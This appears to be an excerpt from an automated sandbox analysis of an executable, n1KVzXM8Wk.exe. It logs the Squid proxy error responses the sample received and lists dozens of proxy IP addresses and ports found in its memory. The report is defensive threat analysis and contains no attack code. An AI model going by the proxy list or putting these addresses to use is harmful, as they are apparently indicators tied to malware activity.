                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.10Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 3705X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.10Mime-Version: 1.0Date: Fri, 23 Feb 2024 09:09:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 3747X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 61 20 69 6d 67 7b 0a 09 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 0a 7d 0a 0a 74 74 20 7b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 20 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 44 32 44 34 37 3b 0a 7d 0a 0a 62 6f 64 79 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0a 09 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 09 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 73 75 70 70 6f 72 74 2e 6f 6c 66 65 6f 2e 63 6f 6d 2f 73 69 74 65 73 2f 6f 6c 66 65 6f 2f 66 69 6c 65 73 2f 66 6f 75 6e 64 61 74 69 6f 6e 5f 6c 6f 67 6f 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 23 63 6f 6e 74 65 6e 74 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 25 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0a 09 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 73 74 61 63 6b 3b 0a 09 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 7a 6f 6f 6d 3a 31 3b 0a 09 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:33 GMTContent-Type: text/htmlContent-Length: 3485X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:33 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 18content-type: text/plaindate: Fri, 23 Feb 2024 08:25:43 GMTserver: svcproxyconnection: closeData Raw: 44 4e 53 20 63 61 63 68 65 20 6f 76 65 72 66 6c 6f 77 Data Ascii: DNS cache overflow
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-3</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-3</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 3725X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.20Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:46:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 3745X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0:80
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.0.84
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.0.84://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.0.84:80
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.170.50
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.170.50://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.170.50:80
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998A88000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199882C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.1.109.141:9999
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199882C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.1.109.141:9999://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199994A000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.10.170.225:4145
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.10.170.225:4145://proxyx
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119940B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.15.62.12:5678
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119940B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.15.62.12:5678://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119985A8000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.148.9:55636
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.148.9:55636://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998324000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.172.45:31225
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199837F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.172.45:31225://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.194.137:4153
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.194.137:4153://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199443A000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199412E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.2.252.65:8080
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.2.252.65:8080://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.137.82:32241
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.137.82:32241://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119999E4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.184.75:4153
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.184.75:4153://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.95.95:5678
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.95.95:5678://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.224.3.122:3888
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.224.3.122:3888://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997F7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.224.3.122:3889
